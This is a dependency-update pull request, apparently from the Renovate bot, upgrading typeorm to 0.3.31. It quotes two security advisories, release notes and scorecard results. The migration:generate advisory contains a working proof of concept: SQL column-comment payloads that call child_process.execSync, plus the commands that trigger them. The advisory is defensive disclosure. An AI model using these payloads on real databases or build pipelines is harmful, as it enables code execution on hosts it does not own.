Skip to content

chore(deps): update dependency typeorm to v0.3.31 [security]#531

Open
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/npm-typeorm-vulnerability
Open

chore(deps): update dependency typeorm to v0.3.31 [security]#531
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/npm-typeorm-vulnerability

Conversation

@renovate

@renovate renovate Bot commented Jun 23, 2026

Copy link
Copy Markdown
Contributor

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
typeorm (source) 0.3.280.3.31 age adoption passing confidence

TypeORM: SQL Injection in UpdateQueryBuilder/SoftDeleteQueryBuilder orderBy (MySQL/MariaDB)

GHSA-9ggv-8w38-r7pm

More information

Details

Impact

Blind SQL injection vulnerability in UpdateQueryBuilder and SoftDeleteQueryBuilder affecting MySQL and MariaDB users.

UpdateQueryBuilder and SoftDeleteQueryBuilder (including their addOrderBy variants) do not validate the order parameter against an allowlist of permitted values (ASC/DESC). The caller-supplied value is stored verbatim and concatenated directly into the generated SQL string without quoting or parameterization. SelectQueryBuilder.orderBy performs this validation correctly; the affected builders do not.

If any code path passes user-controlled input to orderBy/addOrderBy on an update or soft-delete query, an attacker can inject arbitrary SQL via the sort direction — even when the column name itself is hardcoded.

Demonstrated impact includes:

  • Data exfiltration via time-based blind extraction (e.g. using SLEEP() to infer secret values bit by bit)
  • Row targeting manipulation in queries using LIMIT patterns
  • Denial of service via SLEEP()-based query exhaustion

CVSS 3.1: 8.6 (High)AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L

Affected files (relative to commit 73fda419):

  • src/query-builder/UpdateQueryBuilder.ts: lines 383–419 and 718–744
  • src/query-builder/SoftDeleteQueryBuilder.ts: lines 352–388 and 520–546

The vulnerability was introduced in commit 03799bd2 (v0.1.12) and is present through the latest release (v0.3.28).

Patches

A fix has been released in 0.3.29 (1b66c44) and 1.0.0 (93eec63).

Workarounds

Applications can manually validate the order argument before passing it to orderBy or addOrderBy on update or soft-delete query builders:

const direction = userInput.toUpperCase();
if (direction !== 'ASC' && direction !== 'DESC') {
  throw new Error('Invalid sort direction');
}
qb.orderBy(column, direction as 'ASC' | 'DESC');

Do not pass user-controlled values to orderBy/addOrderBy on UpdateQueryBuilder or SoftDeleteQueryBuilder without this validation.

References
  • Introduced in commit 03799bd2 (v0.1.12)
  • Confirmed present in v0.3.28 (commit 73fda419)
  • See SelectQueryBuilder.orderBy for the correct validation pattern this fix should mirror

Severity

  • CVSS Score: 5.9 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


TypeORM: migration:generate template-literal code injection

GHSA-2rp8-mm9q-fp49

More information

Details

Summary

typeorm migration:generate embeds database schema metadata into JS/TS template literals, escaping backticks but not ${...}. An attacker who can write schema metadata (column comments, defaults, view definitions) achieves arbitrary code execution on the host that loads the generated migration.

Details

MigrationGenerateCommand.ts (L117-138) wraps each SQL statement in a JS template literal, escaping only backticks:

"        await queryRunner.query(`" +
    upQuery.query.replaceAll("`", "\\`") +
    "`" + ...

Introspected schema strings reach this sink through driver query runners:

Driver Metadata source Source
Postgres column DEFAULT, COMMENT, CHECK constraints, view definitions PostgresQueryRunner.ts:1782, L1898, L2287, L4125
MySQL/MariaDB COLUMN_DEFAULT, COLUMN_COMMENT MysqlQueryRunner.ts:2873-2974, L3580-3583
CockroachDB Same patterns as Postgres CockroachQueryRunner.ts

escapeComment() on each driver strips only null bytes, leaving ${...} intact:

protected escapeComment(comment?: string) {
    if (!comment) return comment
    comment = comment.replaceAll("\u0000", "")
    return comment
}

When the migration file is loaded (migration:run, import, or require), the JS engine evaluates ${...} as live interpolation.

Affected source:

File Lines Role
MigrationGenerateCommand.ts 117-138 Template-literal construction (sink)
PostgresDriver.ts 1886-1891 escapeComment() — Postgres
MysqlDriver.ts 1322-1328 escapeComment() — MySQL
CockroachDriver.ts 1236-1241 escapeComment() — CockroachDB

Confirmed injection vectors (MySQL):

Vector Result Notes
Column COMMENT Confirmed Proven in PoC below
Column DEFAULT Confirmed Attacker sets ALTER TABLE ... DEFAULT '${...}'; payload appears in generated migration
CHECK constraint Not exploitable MySQL information_schema.CHECK_CONSTRAINTS strips content from CHECK_CLAUSE
View definitions Not tested Requires PostgreSQL ViewEntity introspection; likely exploitable via pg_get_viewdef()

Suggested fix: Escape ${ to \${ (and \\ to \\\\) before embedding query strings into template literals, or switch to emitting the SQL as a JSON.stringify()-encoded regular string argument.

PoC

Prerequisites:

  • Any supported RDBMS (PostgreSQL, MySQL, MariaDB, CockroachDB, SQL Server, Oracle, SAP HANA, or Spanner) accessible to the developer running migration:generate
  • The attacker has DDL/write access to the database, or the application exposes a feature allowing users to set column COMMENT, DEFAULT, or view definition text

Steps:

  1. Inject payload into schema metadata. Set a column comment or default containing ${...}:
-- PostgreSQL
COMMENT ON COLUMN users.name IS '${process.mainModule.require("child_process").execSync("id > /tmp/pwned")}';

-- MySQL
ALTER TABLE users MODIFY COLUMN name VARCHAR(255) COMMENT '${process.mainModule.require("child_process").execSync("id > /tmp/pwned")}';
  1. Run migration generation on the developer/CI machine:
npx typeorm migration:generate -d ./data-source.ts ./migrations/NextMigration
  1. Inspect the generated file. The output .ts file contains unescaped ${...}:
export class NextMigration1234567890 implements MigrationInterface {
  public async up(queryRunner: QueryRunner): Promise<void> {
    await queryRunner.query(
      `COMMENT ON COLUMN "users"."name" IS '${process.mainModule.require("child_process").execSync("id > /tmp/pwned")}'`,
    );
  }
  // ...
}
  1. Run or revert the migration:
npx typeorm migration:revert -d ./data-source.ts

Output confirms code execution — id ran on the host and its output was interpolated into the SQL:

ALTER TABLE `user` CHANGE `name` `name` varchar(255) NULL COMMENT 'uid=501(user) gid=20(staff) groups=20(staff),12(everyone),...'

The payload appears in whichever migration direction restores the DB's current state. A malicious DB comment with a clean entity comment places it in down(). Attacker-influenced entity metadata places it in up(). Either direction executes the code when the method runs.

Impact

Code injection / RCE. An attacker with DB schema write access executes arbitrary JavaScript on any machine that generates and loads the migration. This crosses the DB-to-host trust boundary.

CI/CD pipelines that auto-generate and run migrations are the highest-risk target. Any TypeORM user running migration:generate against a database with attacker-influenced schema metadata is affected.

Severity

  • CVSS Score: 5.7 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Release Notes

typeorm/typeorm (typeorm)

v0.3.31

Compare Source

Bug Fixes
  • cache: release query runner on error in storeInCache (#​12545) (a84b9b3)
  • correct grammar in AlreadyHasActiveConnectionError message (#​12554) (304d129)
  • entity-manager: default invalidWhereValuesBehavior to throw on the write path (#​12690) (44d8052)
  • entity-manager: validate where criteria in increment/decrement (#​12692) (8a51b75)
  • mongodb: use cursor.transform for doc to entity transformation and skip load broadcast in next if toArray (#​11926) (0bbefc9)
  • move hashing function to PlatformTools (#​12648) (c456cbd)
  • multiple recursive cte problems (#​12490) (7c26654)
  • normalization of FindOptionsWhere for arrays and Buffers (#​12577) (a8173fc)
  • persistence: preserve select false columns on the in-memory entity after save() (#​12501) (324c46c)
  • postgres: improve normalizeDatetimeFunction for tstzrange data type (#​12182) (bf47c9f)
  • query-builder: reject empty where criteria on update and delete operations (#​12629) (81b9466)
  • query-builder: wrap inner joins under left joins correctly (#​11137) (d5f4b9d)
  • remove require() calls that break bundlers (#​12647) (30f9fc7)
  • tree-entity: tree entity schema propagation in internal TreeRepository methods (#​12590) (7fb7c2c)

Full Changelog: typeorm/typeorm@0.3.30...0.3.31

v0.3.30

Compare Source

👉 For a structured walk-through of the changes in v1.0 — breaking changes, new features, security fixes, and the upgrade path from 0.3.x — see the v1.0 Release Notes.

The list below is the set of commits between 0.3.30 and 1.0.0 — fixes already shipped on the 0.3.x line are listed under their respective 0.3.x entries below.

Bug Fixes
  • cascade: propagate withDeleted to relation-id loader for many-to-many recover (#​12287) (cfba9e7)
  • cascade: support cascade remove for OneToMany relations with composite PKs (#​12286) (09183c8)
  • cli: preserve devDependencies needed by init command in published package (#​12281) (c3b771c)
  • cockroachdb: preserve structured query results during txn retry replay (#​11861) (09db48c)
  • codemod: apply find-options select/relations rewrites to .exists() too (#​12399) (4461063)
  • codemod: correct relation-count guidance and flag loadRelationCountAndMap (#​12374) (5de5490)
  • codemod: cover ColumnMetadata args.options in column option rewrites (#​12400) (7a68cf2)
  • codemod: exclude type declarations from build (#​12292) (4c645f0)
  • codemod: handle aliases, quoted keys, and ObjectProperty variants (#​12377) (2d15644)
  • codemod: handle lock option objects correctly and increase test coverage (#​12353) (b871719)
  • codemod: handle typeof type queries and use getStringValue consistently (#​12379) (dedea37)
  • codemod: harden destructure and DI accessor rewrites for connection to dataSource rename (#​12398) (057ddbc)
  • codemod: harden scope and type-name detection across more AST shapes (#​12394) (9d1fd8d)
  • codemod: harden scope, idempotency, and import-strip semantics (#​12391) (ed5a19b)
  • codemod: recognize typeorm deep-path imports (#​12382) (a96b097)
  • codemod: rename .connection on EntityMetadata, ColumnMetadata, IndexMetadata (#​12383) (8a51e30), closes #​12249
  • codemod: rewrite typeorm re-exports in barrel files (#​12373) (25f0b5f)
  • codemod: scope v1 transforms to typeorm imports and skip .d.ts files (#​12372) (a34fdb2)
  • codemod: track DataSource accessor chains for typed-variable renames (#​12385) (14a3132)
  • copy cordova query rows affected into query result (#​10873) (ad22c10)
  • disable global order for aggregate functions (#​11925) (2efb2a1)
  • do not run npm install during CLI init (#​12386) (66aa930)
  • docs: add lunr as explicit dependency for pnpm strict hoisting (f4d435e)
  • docs: align code style (#​12081) (5f6eb4c)
  • docs: complete Typesense removal missed during cherry-pick (eb7a5b6)
  • docs: update docs pnpm lockfile for new dependencies (4123db9)
  • eager load relation strategy (#​11326) (5797d97)
  • enhance upsert functionality for proper sql generation with table alias (#​11915) (42ce630)
  • expo: auto-load expo-sqlite driver via loadDependencies() (#​12363) (212c8ef)
  • fix up change detection with date transformer (#​11963) (e3e3c97)
  • fix up generated query with .update() (#​11993) (fe6c072)
  • fix up join attributes inside bracket (#​11218) (d233daa)
  • fix up map objects comparison (#​10990) (f66eee7)
  • fix up save with eagerly loaded relation (#​11975) (f5cea95)
  • fix working with tables with quotes in the names for postgres and cockroachdb (#​10993) (e5a8afb)
  • handle re-save of postgres geometric types (#​11857) (65dea3c)
  • handle relation ids in nested embedded entities (#​11942) (5237bee)
  • include joined entity primary keys in pagination subquery (#​11669) (4ffe666)
  • make shorten method to properly work with camelCase_aliases (#​11283) (8a9a376)
  • merging into an entity now respects null values (#​11154) (1676484)
  • metadata-builder: deferrable for many to many (#​11924) (910fae7)
  • mongo: correctly process embedded arrays of nested documents (#​10940) (bfc293f)
  • mongodb: translate ObjectIdColumn property name to _id in find queries (#​12200) (4decab5)
  • mysql: getVersion returning undefined for PolarDB-X 2.0 (#​11837) (fdcbcba)
  • persistence: handle non-nullable FK in orphaned row nullification (#​11982) (b9aa835)
  • postgres,cockroachdb: load enum values in declaration order (#​12404) (bfa9963)
  • postgres,cockroachdb: use parameterized queries in clearDatabase() (#​12185) (1abf6e7)
  • postgres: execute remaining relation-load and persistence paths sequentially to avoid pg 8.19.0 deprecation (#​12421) (ed9bcb9)
  • postgres: handle timestamptz persistence/hydration correctly (#​11774) (c26fc33)
  • prevent eager relations from being joined twice when explicitly specified (#​11991) (1fa4129)
  • properly escape column alias in orderBy (#​12027) (b975297)
  • query stack trace for mysql/mssql (#​12056) (24677a1)
  • query-builder: follow-up fixes for eager load relation strategy (#​12256) (0801b85)
  • query-builder: resolve alias collision for self-referencing relations with query load strategy (#​11066) (bf6e1ef)
  • query-builder: resolve column lookup when using database column name in addOrderBy (#​11904) (0ebc7e5)
  • query-builder: validate orderBy condition values at runtime (#​12217) (93eec63)
  • query-runner: parameterize queries and escape identifiers to prevent SQL injection (#​12207) (e2284d8)
  • query-runner: parameterize SQL queries across all drivers (#​12197) (c7ea070)
  • raw select query with correctly ordered selected columns (#​11902) (b0dd92d)
  • remove error handling for *-to-many in createPropertyPath (#​11119) (9792beb)
  • remove whitespaces in log query (#​12047) (417593e)
  • resolve issue order subquery column (Cannot get metadata of given alias) (#​11343) (77b6ca9)
  • resolve nameless TableForeignKey on drop foreign key (#​10744) (1a98424)
  • schema: sort composite FK columns to match referenced PK index order (#​12280) (3e32686)
  • security: validate limit() in Update/SoftDelete query builders (#​12436) (9284c16)
  • soft deletion should not update the already soft deleted rows (#​10705) (60b10c8)
  • sqlite: handle simple-enum arrays correctly (#​11865) (73227bc)
  • switch to type imports and exports whenever possible (#​12044) (ad4e806)
  • test: clean up schema-builder test entities and code smells (#​12324) (fd7d3ed)
  • test: replace hardcoded IDs and names with entity references in closure-table test (#​12289) (4f18b34)
  • types: add proper entity typing for queryBuilder.update (#​11296) (7084240)
  • update child's mpath (#​10844) (6f3788b)
  • update RelationIdLoader to use DriverUtils.getAlias (#​11228) (cd7ab97)
  • upsert: handle update false or generatedType properly (#​12030) (21664d5)
  • use file reference for typeorm in playground to prevent false dependabot alerts (#​12438) (7e559d7)
  • use subquery with join map one methods (#​11943) (710d176)
  • ValueTransformer: transform FindOperators in ApplyValueTransformers (#​11172) (54cc6c4)
Features
  • add better typing for conditions in increment and decrement of EntityManager (#​11294) (2260718)
  • add codemod package for automated v1 migration (#​12233) (2ee2190)
  • add deferrable support to exclusion decorator to mirror unique and index decorators (#​11802) (441a000)
  • add encryption key for React Native (#​11736) (c70a65b)
  • add error handling and log warning for ormconfig loading failures (#​11871) (f2547e1)
  • add modern migrations tooling gsoc project (#​11958) (24977e3)
  • add support for installing additional postgres extensions (#​11888) (fbb625b)
  • add support for table comments in SAP HANA (#​11939) (e71108f)
  • aurora-postgres: transaction isolation level support (#​12334) (e899d8f)
  • ci: switch to npm trusted publishing with nightly support (#​11986) (c5680ce)
  • codemod: detect incompatible ecosystem packages and bump dependency versions (#​12360) (2060a5b)
  • codemod: flag FileLogger usage with non-absolute logPath (#​12361) (b2759bd)
  • codemod: flag removed ConnectionManager class constructions (#​12376) (43b8d0b), closes #​12373
  • codemod: flag removed FindOneOptions/FindManyOptions join property (#​12375) (f4f762e)
  • codemod: rename ConnectionOptionsReader.all() to get() and flag path semantics change (#​12362) (8ba2d25)
  • docs: add Geist Mono as monospace font for code snippets (ecec06f)
  • docs: add maintainers landing page and homepage section (d240233)
  • docs: add maintainers page to main navbar (5662b27)
  • docs: add Sofia Sans and Geist typography via Google Fonts (ff5cc26)
  • docs: replace emoji icons with Lucide React and simplify section colors (83c3d8b)
  • gsoc 2026 idea list (#​11953) (5d422ad)
  • invalid-where-values-behavior: make throw the default (#​11710) (c6745f3)
  • mongodb: implement object-based select projection for find methods (#​12237) (7171643)
  • mysql: update query types to include named parameters (#​11798) (c7a3962)
  • postgres: add support for PostgreSQL indices (#​11318) (22ed3ec)
  • postgres: use ADD VALUE when changing enum values if possible (#​10956) (f1be21e)
  • qodo: enable new review experience (#​11909) (c645209)
  • QueryRunner: add ifExists parameter to all drop methods (#​12121) (3e47ee2)
  • sap: add support for generated column in SAP HANA (#​12393) (c35378f)
  • spanner: implement transaction isolation level support (#​12335) (530ee52)
  • sqlite: add support for jsonb column type in SQLite (#​11933) (0b8e937)
  • support INSERT INTO ... SELECT FROM ... in QueryBuilder (#​11896) (8fc0915)
  • support cascade truncate in clear() method (#​11866) (ef596c3)
  • support explicit resource management in QueryRunner (#​11701) (4ad74e1)
  • transactions: add isolationLevel option to DataSource for all drivers (#​12269) (950ce01)
Performance Improvements
BREAKING CHANGES
  • TypeORM is now compiled for ECMAScript 2023, meaning old versions of Node.js are no longer supported. The minimum supported version of Node.js is 20.

0.3.30 (2026-05-18)

Bug Fixes
  • cockroachdb: adjust join in loadTables to load correct table columns (#​12413) (d93402e)
  • find-options: allow array values in JsonContains (#​12420) (90f169d)
  • preserve user-defined shared join columns in change set (#​12354) (0aba011)
  • scope computed-columns join to correct table in MSSQL schema query (#​12288) (6170be6)
  • scope invalidWhereValuesBehavior to high-level abstractions only (#​11878) (1e10fb8)
Reverts

0.3.29 (2026-05-08)

Bug Fixes
Features

0.3.28 (2025-12-02)

Bug Fixes
Features

0.3.27 (2025-09-19)

Bug Fixes
Features
Performance Improvements
Reverts

[0.3.26](https://redirect.github.com/typeorm/typeorm/compare/0.3.25.

Note

PR body was truncated to here.


Configuration

📅 Schedule: (UTC)

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Enabled.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@github-actions

github-actions Bot commented Jun 23, 2026

Copy link
Copy Markdown

Dependency Review

✅ No vulnerabilities or license issues or OpenSSF Scorecard issues found.

OpenSSF Scorecard

PackageVersionScoreDetails
npm/ansis 4.2.0 UnknownUnknown
npm/ansis 4.3.1 UnknownUnknown
npm/brace-expansion 2.1.2 🟢 7.3
Details
CheckScoreReason
Security-Policy🟢 10security policy file detected
Dangerous-Workflow🟢 10no dangerous workflow patterns detected
Binary-Artifacts🟢 10no binaries found in the repo
Packaging⚠️ -1packaging workflow not detected
Code-Review🟢 4Found 7/16 approved changesets -- score normalized to 4
Maintained🟢 1018 commit(s) and 3 issue activity found in the last 90 days -- score normalized to 10
Token-Permissions🟢 10GitHub workflow tokens follow principle of least privilege
Pinned-Dependencies🟢 10all dependencies are pinned
CII-Best-Practices⚠️ 0no effort to earn an OpenSSF best practices badge detected
Fuzzing⚠️ 0project is not fuzzed
License🟢 9license file detected
Branch-Protection⚠️ -1internal error: error during branchesHandler.setup: internal error: some github tokens can't read classic branch protection rules: https://github.com/ossf/scorecard-action/blob/main/docs/authentication/fine-grained-auth-token.md
Signed-Releases⚠️ -1no releases found
SAST⚠️ 0SAST tool is not run on all commits -- score normalized to 0
npm/dayjs 1.11.21 🟢 5.5
Details
CheckScoreReason
Dangerous-Workflow🟢 10no dangerous workflow patterns detected
Maintained🟢 1010 commit(s) and 2 issue activity found in the last 90 days -- score normalized to 10
Code-Review🟢 5Found 8/15 approved changesets -- score normalized to 5
Token-Permissions⚠️ 0detected GitHub workflow tokens with excessive permissions
Binary-Artifacts🟢 10no binaries found in the repo
Pinned-Dependencies⚠️ 0dependency not pinned by hash detected -- score normalized to 0
CII-Best-Practices🟢 10badge detected: Gold
License🟢 10license file detected
Security-Policy⚠️ 0security policy file not detected
Fuzzing⚠️ 0project is not fuzzed
Branch-Protection⚠️ -1internal error: error during branchesHandler.setup: internal error: some github tokens can't read classic branch protection rules: https://github.com/ossf/scorecard-action/blob/main/docs/authentication/fine-grained-auth-token.md
Packaging🟢 10packaging workflow detected
Signed-Releases⚠️ -1no releases found
SAST⚠️ 0SAST tool is not run on all commits -- score normalized to 0
npm/dedent 1.7.2 🟢 4.2
Details
CheckScoreReason
Security-Policy🟢 10security policy file detected
Dangerous-Workflow🟢 10no dangerous workflow patterns detected
Code-Review🟢 3Found 11/29 approved changesets -- score normalized to 3
Maintained⚠️ 00 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0
Packaging⚠️ -1packaging workflow not detected
Binary-Artifacts🟢 10no binaries found in the repo
Pinned-Dependencies⚠️ 0dependency not pinned by hash detected -- score normalized to 0
Token-Permissions⚠️ 0detected GitHub workflow tokens with excessive permissions
CII-Best-Practices⚠️ 0no effort to earn an OpenSSF best practices badge detected
Fuzzing⚠️ 0project is not fuzzed
License🟢 10license file detected
Signed-Releases⚠️ -1no releases found
Branch-Protection⚠️ -1internal error: error during branchesHandler.setup: internal error: some github tokens can't read classic branch protection rules: https://github.com/ossf/scorecard-action/blob/main/docs/authentication/fine-grained-auth-token.md
SAST⚠️ 0SAST tool is not run on all commits -- score normalized to 0
npm/minimatch 9.0.9 🟢 5.1
Details
CheckScoreReason
Packaging⚠️ -1packaging workflow not detected
Dangerous-Workflow🟢 10no dangerous workflow patterns detected
Code-Review⚠️ 0Found 1/28 approved changesets -- score normalized to 0
Maintained⚠️ 10 commit(s) and 2 issue activity found in the last 90 days -- score normalized to 1
Pinned-Dependencies⚠️ 0dependency not pinned by hash detected -- score normalized to 0
Binary-Artifacts🟢 10no binaries found in the repo
Token-Permissions🟢 10GitHub workflow tokens follow principle of least privilege
CII-Best-Practices⚠️ 0no effort to earn an OpenSSF best practices badge detected
Fuzzing⚠️ 0project is not fuzzed
License🟢 10license file detected
Branch-Protection⚠️ -1internal error: error during branchesHandler.setup: internal error: some github tokens can't read classic branch protection rules: https://github.com/ossf/scorecard-action/blob/main/docs/authentication/fine-grained-auth-token.md
Signed-Releases⚠️ -1no releases found
Security-Policy🟢 10security policy file detected
SAST⚠️ 0SAST tool is not run on all commits -- score normalized to 0
npm/typeorm 0.3.31 🟢 7.2
Details
CheckScoreReason
Code-Review🟢 9Found 24/26 approved changesets -- score normalized to 9
Security-Policy🟢 10security policy file detected
Maintained🟢 1030 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10
Dangerous-Workflow🟢 10no dangerous workflow patterns detected
Packaging⚠️ -1packaging workflow not detected
Token-Permissions⚠️ 0detected GitHub workflow tokens with excessive permissions
CII-Best-Practices⚠️ 0no effort to earn an OpenSSF best practices badge detected
License🟢 10license file detected
Binary-Artifacts🟢 10no binaries found in the repo
Pinned-Dependencies🟢 9dependency not pinned by hash detected -- score normalized to 9
Signed-Releases⚠️ -1no releases found
Branch-Protection🟢 5branch protection is not maximal on development and all release branches
Fuzzing⚠️ 0project is not fuzzed
SAST🟢 10SAST tool is run on all commits
npm/uuid 11.1.1 🟢 4.5
Details
CheckScoreReason
Security-Policy⚠️ 0security policy file detected
Maintained🟢 1014 commit(s) and 8 issue activity found in the last 90 days -- score normalized to 10
Code-Review🟢 3Found 8/26 approved changesets -- score normalized to 3
Dangerous-Workflow⚠️ 0dangerous workflow patterns detected
Binary-Artifacts🟢 10no binaries found in the repo
CII-Best-Practices⚠️ 0no effort to earn an OpenSSF best practices badge detected
Pinned-Dependencies🟢 6dependency not pinned by hash detected -- score normalized to 6
Token-Permissions⚠️ 0detected GitHub workflow tokens with excessive permissions
License🟢 10license file detected
Fuzzing⚠️ 0project is not fuzzed
Branch-Protection⚠️ -1internal error: error during branchesHandler.setup: internal error: some github tokens can't read classic branch protection rules: https://github.com/ossf/scorecard-action/blob/main/docs/authentication/fine-grained-auth-token.md
Signed-Releases⚠️ -1no releases found
SAST🟢 7SAST tool is not run on all commits -- score normalized to 7
Packaging🟢 10packaging workflow detected
npm/yargs 17.7.3 🟢 6.9
Details
CheckScoreReason
Packaging⚠️ -1packaging workflow not detected
Dangerous-Workflow🟢 10no dangerous workflow patterns detected
Code-Review🟢 7Found 19/27 approved changesets -- score normalized to 7
Maintained🟢 1011 commit(s) and 29 issue activity found in the last 90 days -- score normalized to 10
Token-Permissions🟢 10GitHub workflow tokens follow principle of least privilege
Binary-Artifacts🟢 10no binaries found in the repo
CII-Best-Practices⚠️ 0no effort to earn an OpenSSF best practices badge detected
Pinned-Dependencies🟢 9dependency not pinned by hash detected -- score normalized to 9
Security-Policy⚠️ 0security policy file not detected
Fuzzing⚠️ 0project is not fuzzed
License🟢 10license file detected
Signed-Releases⚠️ -1no releases found
Branch-Protection⚠️ -1internal error: error during branchesHandler.setup: internal error: some github tokens can't read classic branch protection rules: https://github.com/ossf/scorecard-action/blob/main/docs/authentication/fine-grained-auth-token.md
SAST⚠️ 0SAST tool is not run on all commits -- score normalized to 0
npm/yargs 17.7.2 🟢 6.9
Details
CheckScoreReason
Packaging⚠️ -1packaging workflow not detected
Dangerous-Workflow🟢 10no dangerous workflow patterns detected
Code-Review🟢 7Found 19/27 approved changesets -- score normalized to 7
Maintained🟢 1011 commit(s) and 29 issue activity found in the last 90 days -- score normalized to 10
Token-Permissions🟢 10GitHub workflow tokens follow principle of least privilege
Binary-Artifacts🟢 10no binaries found in the repo
CII-Best-Practices⚠️ 0no effort to earn an OpenSSF best practices badge detected
Pinned-Dependencies🟢 9dependency not pinned by hash detected -- score normalized to 9
Security-Policy⚠️ 0security policy file not detected
Fuzzing⚠️ 0project is not fuzzed
License🟢 10license file detected
Signed-Releases⚠️ -1no releases found
Branch-Protection⚠️ -1internal error: error during branchesHandler.setup: internal error: some github tokens can't read classic branch protection rules: https://github.com/ossf/scorecard-action/blob/main/docs/authentication/fine-grained-auth-token.md
SAST⚠️ 0SAST tool is not run on all commits -- score normalized to 0

Scanned Files

  • test-content/nest-project/package-lock.json

@github-actions

Copy link
Copy Markdown

Dependency Review

✅ No vulnerabilities or license issues or OpenSSF Scorecard issues found.

OpenSSF Scorecard

PackageVersionScoreDetails
npm/brace-expansion 2.1.1 🟢 7.3
Details
CheckScoreReason
Code-Review🟢 4Found 9/22 approved changesets -- score normalized to 4
Binary-Artifacts🟢 10no binaries found in the repo
Dangerous-Workflow🟢 10no dangerous workflow patterns detected
Security-Policy🟢 10security policy file detected
Token-Permissions🟢 10GitHub workflow tokens follow principle of least privilege
Packaging⚠️ -1packaging workflow not detected
Pinned-Dependencies🟢 10all dependencies are pinned
Maintained🟢 109 commit(s) and 3 issue activity found in the last 90 days -- score normalized to 10
CII-Best-Practices⚠️ 0no effort to earn an OpenSSF best practices badge detected
Fuzzing⚠️ 0project is not fuzzed
License🟢 9license file detected
Branch-Protection⚠️ -1internal error: error during branchesHandler.setup: internal error: some github tokens can't read classic branch protection rules: https://github.com/ossf/scorecard-action/blob/main/docs/authentication/fine-grained-auth-token.md
Signed-Releases⚠️ -1no releases found
SAST⚠️ 0SAST tool is not run on all commits -- score normalized to 0
npm/dayjs 1.11.21 🟢 5.5
Details
CheckScoreReason
Code-Review🟢 5Found 8/14 approved changesets -- score normalized to 5
Maintained🟢 1013 commit(s) and 2 issue activity found in the last 90 days -- score normalized to 10
Dangerous-Workflow🟢 10no dangerous workflow patterns detected
Token-Permissions⚠️ 0detected GitHub workflow tokens with excessive permissions
Binary-Artifacts🟢 10no binaries found in the repo
Pinned-Dependencies⚠️ 0dependency not pinned by hash detected -- score normalized to 0
Security-Policy⚠️ 0security policy file not detected
CII-Best-Practices🟢 10badge detected: Gold
License🟢 10license file detected
Fuzzing⚠️ 0project is not fuzzed
Packaging🟢 10packaging workflow detected
Branch-Protection⚠️ -1internal error: error during branchesHandler.setup: internal error: some github tokens can't read classic branch protection rules: https://github.com/ossf/scorecard-action/blob/main/docs/authentication/fine-grained-auth-token.md
Signed-Releases⚠️ -1no releases found
SAST⚠️ 0SAST tool is not run on all commits -- score normalized to 0
npm/dedent 1.7.2 🟢 4.2
Details
CheckScoreReason
Code-Review🟢 3Found 11/29 approved changesets -- score normalized to 3
Dangerous-Workflow🟢 10no dangerous workflow patterns detected
Maintained⚠️ 00 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0
Packaging⚠️ -1packaging workflow not detected
Binary-Artifacts🟢 10no binaries found in the repo
Security-Policy🟢 10security policy file detected
Pinned-Dependencies⚠️ 0dependency not pinned by hash detected -- score normalized to 0
Token-Permissions⚠️ 0detected GitHub workflow tokens with excessive permissions
CII-Best-Practices⚠️ 0no effort to earn an OpenSSF best practices badge detected
Fuzzing⚠️ 0project is not fuzzed
License🟢 10license file detected
Signed-Releases⚠️ -1no releases found
Branch-Protection⚠️ -1internal error: error during branchesHandler.setup: internal error: some github tokens can't read classic branch protection rules: https://github.com/ossf/scorecard-action/blob/main/docs/authentication/fine-grained-auth-token.md
SAST⚠️ 0SAST tool is not run on all commits -- score normalized to 0
npm/minimatch 9.0.9 🟢 5.8
Details
CheckScoreReason
Maintained🟢 76 commit(s) and 3 issue activity found in the last 90 days -- score normalized to 7
Code-Review⚠️ 0Found 1/28 approved changesets -- score normalized to 0
Binary-Artifacts🟢 10no binaries found in the repo
Packaging⚠️ -1packaging workflow not detected
Dangerous-Workflow🟢 10no dangerous workflow patterns detected
Token-Permissions🟢 10GitHub workflow tokens follow principle of least privilege
Pinned-Dependencies⚠️ 0dependency not pinned by hash detected -- score normalized to 0
CII-Best-Practices⚠️ 0no effort to earn an OpenSSF best practices badge detected
License🟢 10license file detected
Fuzzing⚠️ 0project is not fuzzed
Signed-Releases⚠️ -1no releases found
Branch-Protection⚠️ -1internal error: error during branchesHandler.setup: internal error: some github tokens can't read classic branch protection rules: https://github.com/ossf/scorecard-action/blob/main/docs/authentication/fine-grained-auth-token.md
Security-Policy🟢 10security policy file detected
SAST⚠️ 0SAST tool is not run on all commits -- score normalized to 0
npm/typeorm 0.3.29 🟢 7.2
Details
CheckScoreReason
Maintained🟢 1030 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10
Security-Policy🟢 10security policy file detected
Packaging⚠️ -1packaging workflow not detected
Code-Review🟢 9Found 19/20 approved changesets -- score normalized to 9
Dangerous-Workflow🟢 10no dangerous workflow patterns detected
CII-Best-Practices⚠️ 0no effort to earn an OpenSSF best practices badge detected
Token-Permissions⚠️ 0detected GitHub workflow tokens with excessive permissions
License🟢 10license file detected
Binary-Artifacts🟢 10no binaries found in the repo
Pinned-Dependencies🟢 9dependency not pinned by hash detected -- score normalized to 9
Branch-Protection🟢 5branch protection is not maximal on development and all release branches
Signed-Releases⚠️ -1no releases found
Fuzzing⚠️ 0project is not fuzzed
SAST🟢 9SAST tool detected but not run on all commits
npm/uuid 11.1.1 🟢 5.1
Details
CheckScoreReason
Dangerous-Workflow⚠️ -1internal error: internal error: invalid GitHub workflow: :30:31: could not parse as YAML: mapping values are not allowed in this context [syntax-check]
